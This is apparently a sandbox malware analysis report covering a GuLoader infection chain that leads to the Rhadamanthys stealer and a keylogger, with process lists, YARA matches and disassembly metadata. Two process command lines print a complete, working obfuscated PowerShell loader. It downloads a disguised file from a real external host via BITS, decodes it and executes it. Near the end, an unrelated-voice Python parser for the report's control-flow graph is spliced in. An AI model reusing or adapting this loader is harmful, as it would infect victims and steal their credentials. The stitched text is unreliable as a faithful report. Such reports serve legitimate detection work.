Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 
'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia 
SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. 
UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;"
                                                                                    Imagebase:0x7ff7be880000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:06:47:45
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6d64d0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:06:47:48
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7e52b0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:5
                                                                                    Start time:06:47:59
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 
'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BreakthSAmphibil SkremaecarnifieCloverlpKursusf Reklaps1 Injuri}Oversate UnderwlTotalvgs TiresreErsalfa{SammenhSAlansbotFacettea Syphilr forerutPreulti-AncyroiSCassocklArbejdseSluicedeEarthsepAndenda Mlterrn1Kommena;SexagesFCirkusmu KonklunnonfinidContagimFrynsenoSheiladnsaltishgAttribu Moniti$Ventoseb Verniee LowerskGangliorHeteropaZoopatheFlettonfHoefligtMendelieJoshrou0Selvbet0Fotogra}Fagudda ');Fundmong (Krse ' Udledn$FarrisagGroteskl PresteoSkalperbValnddeaUnscrewl Piezom: FortalC LyderurKingleau BlockasparathyaStrandhdIntensioOlympiavHaandpaaMystacaeChasses7Irregja=Danefst(BinderiT RektoreCooreeus PaagretArtisko- LuftruPUnpropia Fodgngt DorylihKontakt Mathiah$OutmeasCTriartirUnasceruKnistensConjureaNormeridScriptuo BlgetrvPostlapaSlagsvre bookpr2 Overvr)Stakero ') ;}Fundmong (Krse 'estriat$GubbinsgEltonkllHermeneo BlidgrbDemissia 
SubjeklLuftala:AbrasaxGanuextraSkriveuzDisgusteFinansgnKristjap TaarnhaOpslmmerRegnskatThongdinBrneopd1Discolo7unaccus Agrgodk=Forvirr GradphoG PindsveKonkurrtDokefor-InterceCGrshoppo TilmelnScrapint DobbeleRadarovn Ingratt Begynd Tactin$VagarisCacidprorBisquesuSagtmodsBlaamusaCincinadGemmernoForhandvJeronymaAxolotle Bovnen2Overfie ');Fundmong (Krse 'Stagnin$DisseisgSpotligl KapninobaarebubHenfaldaHighflilMouthbr: PaastaOFortrylpToddlerdThiosula FriandtTrophieeOleoster FinaliiBrigadenUnacetigPalaeoc Brodni=Triolog Derover[BimanasS KokosbyAmyunnasPrototatPrologkeKvotastmFunctio.LskedriCTaabelioInsularnsudsingvpietisme TicklerWarnisstEnuncia] tuberc: Eyelet:AfvisesFSkriverrRespecioQuisquimOutactiBIntestia Runddes Rangore Starbl6Yachtie4uselskaSPignolitGodarterPaganisi DrawknnAdgangsgHeintje(Pursier$CalicosGCatenataContempzflercife kvidisnInsubdupHessianaIatroterJambedntUnconcenKongres1Statsli7Sceneme)Ruttera ');Fundmong (Krse 'trident$EksegetgBelivesldistriboUdspndtb PascalaHendecal Unquel:Medflgkb BilabieFodnotek Bobbysr Knappea AssocieBryologf PrivattEstopgeeFgtekaa2 Paavir Fiskekr=Daahind Inaugur[DecastcS knivmuyHalvlegs Scrawlt Subchoepositifm Kjrsga.PolymorToutliveeDialogix CloturtHepatot. PalamiE PhoebenOksefilc TekstkoAssessodMuseebai EmpighnUnscrapg Turist]valgret:Kylling:UnspeciAgluepotS SponsoCBombaziIFulviavIHmroege.FiberedGMetropoeEmulsoit ClavatSKneadmetVerbenarAphthoniMaaltidnAffiesvgTogfrer(Ekshibi$ProportOCodaspopvallisedTaenioiaMumacryt rammeve BrevskrCocompoi iviedmnRetsinsgMajuscu)Hylests ');Fundmong (Krse 'Reneger$Pickersgfllesanl misorgoOutchidbNedskriaMulticol Afhaar:ForsmdebAnnielleSubthrek HalogerBiofysiaStatsameCymlingflettiettPatienteinjuran3 samfun=Randrus$OvercrabAffaldseUtopistkrdviolerAutomata Hugsple PredoufKissemitEkstempeFodring2Tediums. 
UdviklsKameelsu decinobSkggedes AnfordtVenligtr JuveleiMisnumbnInstillgfrinumr(Talwars2Sgraffi7Sclerot2 Skjold2Nonsupp6Mormonb0Somatat,Planlgn2 Desill3 Rainin7 Anstan2Minilec9slidsni)Baragno ');Fundmong $bekraefte3;"
                                                                                    Imagebase:0xba0000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2552391162.0000000008590000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2541535117.0000000005841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2552866056.000000000A363000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:06:48:17
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                    Imagebase:0xd40000
                                                                                    File size:516'608 bytes
                                                                                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.2575308321.00000000256F0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000003.2574777767.00000000254D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000007.00000003.2585733508.0000000024FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000003.2576092102.00000000055F3000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:06:48:37
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\SysWOW64\dialer.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\system32\dialer.exe"
                                                                                    Imagebase:0x510000
                                                                                    File size:32'256 bytes
                                                                                    MD5 hash:E4BD77FB64DDE78F1A95ECE09F6A9B85
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.2578876174.0000000005930000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.2578561473.0000000005710000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.2576375337.0000000003520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.2666601703.0000000005685000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:false


                                                                                      Execution Graph

                                                                                      Execution Coverage:5.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:27.8%
                                                                                      Total number of Nodes:18
                                                                                      Total number of Limit Nodes:0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7n$(7n$07n$87n$@7n$@7n$H7n$P7n$x6n$x6n$6n
                                                                                      • API String ID: 0-2561439285
                                                                                      • Opcode ID: 0b842faa0fbff550446a851e9a3ba466cf1dfe592820566f717a07933ec9dd2c
                                                                                      • Instruction ID: 12a83c260a8407a9bcee9cfbc8dc60afd97898625d88a0431107f605ddc6cd54
                                                                                      • Opcode Fuzzy Hash: 0b842faa0fbff550446a851e9a3ba466cf1dfe592820566f717a07933ec9dd2c
                                                                                      • Instruction Fuzzy Hash: 05B24F30A1CA4A8FEB99EB28C8557A973E2FF55340F5441B9D40DC7296DF38AC82CB45

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: x6n$x6n
                                                                                      • API String ID: 0-3933258741
                                                                                      • Opcode ID: dd9ba8cb8c3805bb2f6a54b2fbc3181e5b91a29e3fe7f9bb26eba4fc06e275e1
                                                                                      • Instruction ID: a454f4e3c2d539a12332e1cf61193137994b18d098923862e3e1c6c164020d0f
                                                                                      • Opcode Fuzzy Hash: dd9ba8cb8c3805bb2f6a54b2fbc3181e5b91a29e3fe7f9bb26eba4fc06e275e1
                                                                                      • Instruction Fuzzy Hash: 63729D30A1CA4A8FEB98EB28C4556B973E2FF99344F544179D40ED3296DF39A842CB44

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: r9B8$r9B8
                                                                                      • API String ID: 0-2917399790
                                                                                      • Opcode ID: ba9656de41c3312acb75eca44dfff9f953b32e6d1d02c480a5536826f4738bab
                                                                                      • Instruction ID: 7d8902ee4413f4aaf44bd203279fc7c1f4d9157fec264f4c3ddfff3028851bce
                                                                                      • Opcode Fuzzy Hash: ba9656de41c3312acb75eca44dfff9f953b32e6d1d02c480a5536826f4738bab
                                                                                      • Instruction Fuzzy Hash: D9F1B53090CA8E8FEBA8EF28C8557E93BD1FF54354F04426EE84DC7291DB7498458B86

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: r9B8$r9B8
                                                                                      • API String ID: 0-2917399790
                                                                                      • Opcode ID: 57539ac98aa42c4776a22463f4677439c809e112e386d3bbe89fbfc4ce667184
                                                                                      • Instruction ID: 10c54c72fc4453e3ded912b57b8803158fa5174221b1c392c32cde472ffcf776
                                                                                      • Opcode Fuzzy Hash: 57539ac98aa42c4776a22463f4677439c809e112e386d3bbe89fbfc4ce667184
                                                                                      • Instruction Fuzzy Hash: 85E1D33090CA8E8FEBA8EF28C8557E977D1FB54354F14826ED84DC72A1DF78A8448785

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID:
                                                                                      • API String ID: 542301482-0
                                                                                      • Opcode ID: 1a8a13c7247f74652af91a716a411aae1585e34c6151bf31b2f8dfc27dfeada2
                                                                                      • Instruction ID: 754665841a7f6dc15a52ec1a81655658afc685802f0a5b8baf910dfe45c9a30b
                                                                                      • Opcode Fuzzy Hash: 1a8a13c7247f74652af91a716a411aae1585e34c6151bf31b2f8dfc27dfeada2
                                                                                      • Instruction Fuzzy Hash: BA910571A0CA498FEB5CEB6C98497B97BE1FB99321F04427ED00DC3292DF3468468795

                                                                                       Control-flow Graph

                                                                                       • Basic blocks (node id: address range): 735: 7ff848e8e5b9-7ff848e8e5bd; 736: 7ff848e8e5c5; 737: 7ff848e8e5bf; 738: 7ff848e8e5c7; 739: 7ff848e8e5c8-7ff848e8e5d9; 740: 7ff848e8e5db; 741: 7ff848e8e5dc-7ff848e8e676 (calls IUnknown_QueryInterface_Proxy); 744: 7ff848e8e678; 745: 7ff848e8e67e-7ff848e8e69b
                                                                                       • Edges: 735->736, 735->737, 736->738, 736->739, 737->736, 738->739, 739->740, 739->741, 740->741, 741->744, 741->745, 744->745
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2849117218.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: Interface_ProxyQueryUnknown_
                                                                                      • String ID:
                                                                                      • API String ID: 2522245112-0
                                                                                      • Opcode ID: 98dd243f64a4e4d1b947d860d69e2f219703e2f751da5d81bbe8783600689419
                                                                                      • Instruction ID: 562da1a0d699962f5698db27403f7eb4936bd696d30009b0ea97744677dbbe8d
                                                                                      • Opcode Fuzzy Hash: 98dd243f64a4e4d1b947d860d69e2f219703e2f751da5d81bbe8783600689419
                                                                                      • Instruction Fuzzy Hash: FB31287191CB884FD729AB6C9C1A6BA7FF4EB56321F04417FE089C3152DB246446CB86

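The control-flow graph that Joe Sandbox emits for the function at 7ff848e8e5b9 above is a flattened token list: a node id, its address or address range, any API names called in that block, and "a->b" edges. The parser below is an added example, not code from the Joe Sandbox report or product; it takes the page's own listing for that function as input and rebuilds the basic blocks and edges so that the entry and exit blocks, the block that calls IUnknown_QueryInterface_Proxy, and a Graphviz DOT rendering can be recovered. The token layout is inferred from the listing on this page and is an assumption about the format.

```python
"""Rebuild basic blocks and edges from a flattened Joe Sandbox
``control_flow_graph`` listing.

Added example, not Joe Sandbox code. The token layout (node id, address or
address range, optional API names, then "a->b" edges) is an assumption
inferred from the listing on this page.
"""
from __future__ import annotations

import re
from collections import deque
from dataclasses import dataclass, field

# Verbatim copy of the page's Control-flow Graph listing for 7ff848e8e5b9.
SAMPLE_CFG = (
    "control_flow_graph 735 7ff848e8e5b9-7ff848e8e5bd 736 7ff848e8e5c5 "
    "735->736 737 7ff848e8e5bf 735->737 738 7ff848e8e5c7 736->738 "
    "739 7ff848e8e5c8-7ff848e8e5d9 736->739 737->736 738->739 740 7ff848e8e5db "
    "739->740 741 7ff848e8e5dc-7ff848e8e676 IUnknown_QueryInterface_Proxy "
    "739->741 740->741 744 7ff848e8e678 741->744 745 7ff848e8e67e-7ff848e8e69b "
    "741->745 744->745"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


@dataclass
class Block:
    node_id: int
    start: int  # first instruction address of the block
    end: int    # last instruction address (equals start for a single-address block)
    apis: list[str] = field(default_factory=list)  # API names called in this block


@dataclass
class CFG:
    blocks: dict[int, Block]
    edges: list[tuple[int, int]]

    def successors(self, n: int) -> list[int]:
        return sorted(b for a, b in self.edges if a == n)

    def predecessors(self, n: int) -> list[int]:
        return sorted(a for a, b in self.edges if b == n)

    def entry_blocks(self) -> list[int]:
        return [n for n in sorted(self.blocks) if not self.predecessors(n)]

    def exit_blocks(self) -> list[int]:
        return [n for n in sorted(self.blocks) if not self.successors(n)]

    def blocks_calling(self, api: str) -> list[int]:
        return [n for n, b in sorted(self.blocks.items()) if api in b.apis]

    def reachable_from(self, n: int) -> set[int]:
        seen, todo = set(), deque([n])
        while todo:
            cur = todo.popleft()
            if cur in seen:
                continue
            seen.add(cur)
            todo.extend(self.successors(cur))
        return seen

    def to_dot(self) -> str:
        """Graphviz DOT text; blocks that call an API carry the name in their label."""
        lines = ["digraph cfg {"]
        for n, b in sorted(self.blocks.items()):
            label = f"{n}: {b.start:x}-{b.end:x}"
            if b.apis:
                label += "\\n" + ", ".join(b.apis)
            lines.append(f'  {n} [label="{label}"];')
        lines += [f"  {a} -> {b};" for a, b in self.edges]
        lines.append("}")
        return "\n".join(lines)


def parse_cfg(text: str) -> CFG:
    tokens = text.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a Joe Sandbox control_flow_graph listing")
    blocks: dict[int, Block] = {}
    edges: list[tuple[int, int]] = []
    current: Block | None = None  # block to which trailing API names belong
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if (m := _EDGE.match(tok)):
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None  # API names follow a block's address, never an edge
        elif tok.isdigit():
            i += 1  # the node id is always followed by its address (range)
            m = _ADDR.match(tokens[i]) if i < len(tokens) else None
            if not m:
                raise ValueError(f"node {tok} is not followed by an address")
            start = int(m.group(1), 16)
            end = int(m.group(2), 16) if m.group(2) else start
            current = blocks[int(tok)] = Block(int(tok), start, end)
        elif current is not None:
            current.apis.append(tok)
        else:
            raise ValueError(f"unexpected token {tok!r}")
        i += 1
    for a, b in edges:
        if a not in blocks or b not in blocks:
            raise ValueError(f"edge {a}->{b} references an unknown block")
    return CFG(blocks, edges)


if __name__ == "__main__":
    cfg = parse_cfg(SAMPLE_CFG)
    print(f"{len(cfg.blocks)} blocks, {len(cfg.edges)} edges; "
          f"entry {cfg.entry_blocks()}, exit {cfg.exit_blocks()}")
    for n in cfg.blocks_calling("IUnknown_QueryInterface_Proxy"):
        b = cfg.blocks[n]
        print(f"block {n} ({b.start:x}-{b.end:x}) calls IUnknown_QueryInterface_Proxy")
    print(cfg.to_dot())
```

The parser is deliberately strict: an API name that turns up without a preceding block, or an edge that names an unknown block, raises rather than being silently attached to the wrong node, so a change in the report's token layout shows up as an error instead of a misattributed API call.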
                                                                                      Memory Dump Source
